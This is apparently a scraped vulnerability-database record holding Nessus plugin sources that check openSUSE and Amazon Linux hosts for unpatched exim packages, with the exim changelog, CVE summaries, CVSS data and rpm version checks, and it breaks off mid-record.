startup.\n\n - Early-pipelining support code is now included unless\n disabled in Makefile.\n\n - DKIM verification defaults no long accept sha1 hashes,\n to conform to RFC 8301. They can still be enabled, using\n the dkim_verify_hashes main option.\n\n - Support CHUNKING from an smtp transport using a\n transport_filter, when DKIM signing is being done.\n Previously a transport_filter would always disable\n CHUNKING, falling back to traditional DATA.\n\n - Regard command-line receipients as tainted.\n\n - Bug 340: Remove the daemon pid file on exit, whe due to\n SIGTERM.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition. It\n seems that the PAM library frees one of the arguments\n given to it, despite the documentation. Therefore a\n plain malloc must be used.\n\n - Bug 2491: Use tainted buffers for the transport smtp\n context. Previously on-stack buffers were used,\n resulting in a taint trap when DSN information copied\n from a received message was written into the buffer.\n\n - Bug 2493: Harden ARC verify against Outlook, whick has\n been seen to mix the ordering of its ARC headers. This\n caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when\n needed. Previously when a new record was being\n constructed with information from the peer, a trap was\n taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n Previously a naiive installation would get error\n messages from DMARC verify, when it hit the nonexistent\n file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option.\n Also enforce no DMARC verification for command-line\n sourced messages.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform,\n hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before\n handling another message on a connection. Previously if\n one message had ARC headers and the following one did\n not, a crash could result when adding an\n Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string\n handling between the Exim main code and Exim-related\n utities. The introduction of taint tracking also did\n many adjustments to string handling. Since then, eximon\n frequently terminated with an assert failure.\n\n - When PIPELINING, synch after every hundred or so RCPT\n commands sent and check for 452 responses. This slightly\n helps the inefficieny of doing a large alias-expansion\n into a recipient-limited target. The max_rcpt transport\n option still applies (and at the current default, will\n override the new feature). The check is done for either\n cause of synch, and forces a fast-retry of all 452'd\n recipients using a new MAIL FROM on the same connection.\n The new facility is not tunable at this time.\n\n - Fix the variables set by the gsasl authenticator.\n Previously a pointer to library live data was being\n used, so the results became garbage. Make copies while\n it is still usable.\n\n - Logging: when the deliver_time selector ise set, include\n the DT= field on delivery deferred (==) and failed (**)\n lines (if a delivery was attemtped). Previously it was\n only on completion (=>) lines.\n\n - Authentication: the gsasl driver not provides the $authN\n variables in time for the expansion of the\n server_scram_iter and server_scram_salt options.\n\nspec file cleanup to make update work\n\n - add docdir to spec\n\n - update to exim 4.93\n\n - SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n\n - DISABLE_TLS replaces SUPPORT_TLS\n\n - Bump the version for the local_scan API.\n\n - smtp transport option hosts_try_fastopen defaults to\n '*'.\n\n - DNSSec is requested (not required) for all queries.\n (This seemes to ask for trouble if your resolver is a\n systemd-resolved.)\n\n - Generic router option retry_use_local_part defaults to\n 'true' under specific pre-conditions.\n\n - Introduce a tainting mechanism for values read from\n untrusted sources.\n\n - Use longer file names for temporary spool files (this\n avoids name conflicts with spool on a shared file\n system).\n\n - Use dsn_from main config option (was ignored\n previously).\n\n - update to exim 4.92.3\n\n - CVE-2019-16928: fix against Heap-based buffer overflow\n in string_vformat, remote code execution seems to be\n possible\n\n - update to exim 4.92.2\n\n - CVE-2019-15846: fix against remote attackers executing\n arbitrary code as root via a trailing backslash\n\n - update to exim 4.92.1\n\n - CVE-2019-13917: Fixed an issue with $(sort) expansion\n which could allow remote attackers to execute other\n programs with root privileges (boo#1142207)\n\n - spec file cleanup\n\n - fix DANE inclusion guard condition\n\n - re-enable i18n and remove misleading comment\n\n - EXPERIMENTAL_SPF is now SUPPORT_SPF\n\n - DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n\n - $(l_header:<name>) expansion\n\n - $(readsocket) now supports TLS\n\n - 'utf8_downconvert' option (if built with SUPPORT_I18N)\n\n - 'pipelining' log_selector\n\n - JSON variants for $(extract ) expansion\n\n - 'noutf8' debug option\n\n - TCP Fast Open support on MacOS\n\n - CVE-2019-10149: Fixed a Remote Command Execution\n (boo#1136587)\n\n - add workaround patch for compile time error on missing\n printf format annotation (gnu_printf.patch)\n\n - update to 4.91\n\n - DEFER rather than ERROR on redis cluster MOVED response.\n\n - Catch and remove uninitialized value warning in exiqsumm\n\n - Disallow '/' characters in queue names specified for the\n 'queue=' ACL modifier. This matches the restriction on\n the commandline.\n\n - Fix pgsql lookup for multiple result-tuples with a\n single column. Previously only the last row was\n returned.\n\n - Bug 2217: Tighten up the parsing of DKIM signature\n headers.\n\n - Bug 2215: Fix crash associated with dnsdb lookup done\n from DKIM ACL.\n\n - Fix issue with continued-connections when the DNS shifts\n unreliably.\n\n - Bug 2214: Fix SMTP responses resulting from non-accept\n result of MIME ACL.\n\n - The 'support for' informational output now, which built\n with Content Scanning support, has a line for the\n malware scanner interfaces compiled in. Interface can be\n individually included or not at build time.\n\n - The 'aveserver', 'kavdaemon' and 'mksd' interfaces are\n now not included by the template makefile 'src/EDITME'.\n The 'STREAM' support for an older ClamAV interface\n method is removed.\n\n - Bug 2223: Fix mysql lookup returns for the no-data case\n (when the number of rows affected is given instead).\n\n - The runtime Berkeley DB library version is now\n additionally output by 'exim -d -bV'. Previously only\n the compile-time version was shown.\n\n - Bug 2230: Fix cutthrough routing for nonfirst messages\n in an initiating SMTP connection.\n\n - Bug 2229: Fix cutthrough routing for nonstandard port\n numbers defined by routers.\n\n - Bug 2174: A timeout on connect for a callout was also\n erroneously seen as a timeout on read on a GnuTLS\n initiating connection, resulting in the initiating\n connection being dropped.\n\n - Relax results from ACL control request to enable\n cutthrough, in unsupported situations, from error to\n silently (except under debug) ignoring.\n\n - Fix Buffer overflow in base64d() (CVE-2018-6789)\n\n - Fix bug in DKIM verify: a buffer overflow could corrupt\n the malloc metadata, resulting in a crash in free().\n\n - Fix broken Heimdal GSSAPI authenticator integration.\n\n - Bug 2113: Fix conversation closedown with the Avast\n malware scanner.\n\n - Bug 2239: Enforce non-usability of\n control=utf8_downconvert in the mail ACL.\n\n - Speed up macro lookups during configuration file read,\n by skipping non- macro text after a replacement\n (previously it was only once per line) and by skipping\n builtin macros when searching for an uppercase lead\n character.\n\n - DANE support moved from Experimental to mainline. The\n Makefile control for the build is renamed.\n\n - Fix memory leak during multi-message connections using\n STARTTLS.\n\n - Bug 2236: When a DKIM verification result is overridden\n by ACL, DMARC reported the original. Fix to report (as\n far as possible) the ACL result replacing the original.\n\n - Fix memory leak during multi-message connections using\n STARTTLS under OpenSSL\n\n - Bug 2242: Fix exim_dbmbuild to permit directoryless\n filenames.\n\n - Fix utf8_downconvert propagation through a redirect\n router.\n\n - Bug 2253: For logging delivery lines under PRDR, append\n the overall DATA response info to the (existing)\n per-recipient response info for the 'C=' log element.\n\n - Bug 2251: Fix ldap lookups that return a single\n attribute having zero- length value.\n\n - Support Avast multiline protocol, this allows passing\n flags to newer versions of the scanner.\n\n - Ensure that variables possibly set during message\n acceptance are marked dead before release of memory in\n the daemon loop.\n\n - Bug 2250: Fix a longstanding bug in heavily-pipelined\n SMTP input (such as a multi-recipient message from a\n mailinglist manager).\n\n - The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is\n withdrawn, being replaced by the $(authresults )\n expansion.\n\n - Bug 2257: Fix pipe transport to not use a socket-only\n syscall.\n\n - Set a handler for SIGTERM and call exit(3) if running as\n PID 1. This allows proper process termination in\n container environments.\n\n - Bug 2258: Fix spool_wireformat in combination with LMTP\n transport. Previously the 'final dot' had a newline\n after it; ensure it is CR,LF.\n\n - SPF: remove support for the 'spf' ACL condition outcome\n values 'err_temp' and 'err_perm', deprecated since 4.83\n when the RFC-defined words ' temperror' and 'permerror'\n were introduced.\n\n - Re-introduce enforcement of no cutthrough delivery on\n transports having transport-filters or DKIM-signing.\n\n - Cutthrough: for a final-dot response timeout (and\n nonunderstood responses) in defer=pass mode supply a 450\n to the initiator. Previously the message would be\n spooled.\n\n - DANE: add dane_require_tls_ciphers SMTP Transport\n option; if unset, tls_require_ciphers is used as before.\n\n - Malware Avast: Better match the Avast multiline\n protocol.\n\n - Fix reinitialisation of DKIM logging variable between\n messages.\n\n - Bug 2255: Revert the disable of the OpenSSL session\n caching.\n\n - Add util/renew-opendmarc-tlds.sh script for safe renewal\n of public suffix list.\n\n - DKIM: accept Ed25519 pubkeys in\n SubjectPublicKeyInfo-wrapped form, since the IETF WG has\n not yet settled on that versus the original 'bare'\n representation.\n\n - Fix syslog logging for syslog_timestamp=no and\n log_selector +millisec. Previously the millisecond value\n corrupted the output. Fix also for syslog_pid=no and\n log_selector +pid, for which the pid corrupted the\n output.\n\n - Replace xorg-x11-devel by individual pkgconfig()\n buildrequires. \n\n - update to 4.90.1\n\n - Allow PKG_CONFIG_PATH to be set in Local/Makefile and\n use it correctly during configuration. Wildcards are\n allowed and expanded.\n\n - Shorten the log line for daemon startup by collapsing\n adjacent sets of identical IP addresses on different\n listening ports. Will also affect 'exiwhat' output.\n\n - Tighten up the checking in isip4 (et al): dotted-quad\n components larger than 255 are no longer allowed.\n\n - Default openssl_options to include +no_ticket, to reduce\n load on peers. Disable the session-cache too, which\n might reduce our load. Since we currrectly use a new\n context for every connection, both as server and client,\n there is no benefit for these.\n\n - Add $SOURCE_DATE_EPOCH support for reproducible builds,\n per spec at\n <https://reproducible-builds.org/specs/source-date-epoch\n />.\n\n - Fix smtp transport use of limited max_rcpt under\n mua_wrapper. Previously the check for any unsuccessful\n recipients did not notice the limit, and erroneously\n found still-pending ones.\n\n - Pipeline CHUNKING command and data together, on kernels\n that support MSG_MORE. Only in-clear (not on TLS\n connections).\n\n - Avoid using a temporary file during transport using\n dkim. Unless a transport-filter is involved we can\n buffer the headers in memory for creating the signature,\n and read the spool data file once for the signature and\n again for transmission.\n\n - Enable use of sendfile in Linux builds as default. It\n was disabled in 4.77 as the kernel support then wasn't\n solid, having issues in 64bit mode. Now, it's been long\n enough. Add support for FreeBSD also.\n\n - Add commandline_checks_require_admin option.\n\n - Do pipelining under TLS.\n\n - For the 'sock' variant of the malware scanner interface,\n accept an empty cmdline element to get the documented\n default one. Previously it was inaccessible.\n\n - Prevent repeated use of -p/-oMr\n\n - DKIM: enforce the DNS pubkey record 'h' permitted-hashes\n optional field, if present.\n\n - DKIM: when a message has multiple signatures matching an\n identity given in dkim_verify_signers, run the dkim acl\n once for each.\n\n - Support IDNA2008.\n\n - The path option on a pipe transport is now expanded\n before use\n\n - Have the EHLO response advertise VRFY, if there is a\n vrfy ACL defined.\n\n - Several bug fixes\n\n - Fix for buffer overflow in base64decode() (boo#1079832\n CVE-2018-6789)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079832\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171490\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171877\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173693\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1185631\");\n script_set_attribute(attribute:\"see_also\", value:\"https://reproducible-builds.org/specs/source-date-epoch/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-15846\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-28026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"exim-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"exim-debuginfo-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"exim-debugsource-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"eximon-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"eximon-debuginfo-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"eximstats-html-4.94.2-lp152.8.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-01T14:27:35", "description": "The version of exim installed on the remote host is prior to 4.92-1.27. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS-2021-1497 advisory.\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local users can alter the behavior of root processes because a recipient address can have a newline character. (CVE-2020-28015)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. NOTE: remote exploitation may be difficult because of resource consumption. (CVE-2020-28017)\n\n - Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL. (CVE-2020-28018)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. An authenticated remote SMTP client can insert newline characters into a spool file (which indirectly leads to remote code execution as root) via AUTH= in a MAIL FROM command. (CVE-2020-28021)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : exim (ALAS-2021-1497)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28015", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28021"], "modified": "2022-05-10T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:exim", "p-cpe:/a:amazon:linux:exim-debuginfo", "p-cpe:/a:amazon:linux:exim-greylist", "p-cpe:/a:amazon:linux:exim-mon", "p-cpe:/a:amazon:linux:exim-mysql", "p-cpe:/a:amazon:linux:exim-pgsql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2021-1497.NASL", "href": "https://www.tenable.com/plugins/nessus/149430", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2021-1497.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149430);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2020-28015\",\n \"CVE-2020-28017\",\n \"CVE-2020-28018\",\n \"CVE-2020-28021\"\n );\n script_xref(name:\"ALAS\", value:\"2021-1497\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2021-1497)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of exim installed on the remote host is prior to 4.92-1.27. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS-2021-1497 advisory.\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local users can alter the behavior of\n root processes because a recipient address can have a newline character. (CVE-2020-28015)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail\n message with fifty million recipients. NOTE: remote exploitation may be difficult because of resource\n consumption. (CVE-2020-28017)\n\n - Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for\n builds with OpenSSL. (CVE-2020-28018)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. An authenticated remote SMTP client\n can insert newline characters into a spool file (which indirectly leads to remote code execution as root)\n via AUTH= in a MAIL FROM command. (CVE-2020-28021)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2021-1497.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-28015\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-28017\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-28018\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-28021\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update exim' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28021\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-28018\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\npkgs = [\n {'reference':'exim-4.92-1.27.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-4.92-1.27.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-debuginfo-4.92-1.27.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-debuginfo-4.92-1.27.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-greylist-4.92-1.27.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-greylist-4.92-1.27.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-mon-4.92-1.27.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-mon-4.92-1.27.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-mysql-4.92-1.27.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-mysql-4.92-1.27.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-pgsql-4.92-1.27.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-pgsql-4.92-1.27.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:24:57", "description": "exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim (bsc#1136587)", "cvss3": {}, "published": "2019-06-12T00:00:00", "type": "nessus", "title": "openSUSE Security Update : exim (openSUSE-2019-1524)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim-debugsource", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximstats-html", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-1524.NASL", "href": "https://www.tenable.com/plugins/nessus/125843", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-1524.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125843);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2019-1524)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim\n (bsc#1136587)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1136587\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", 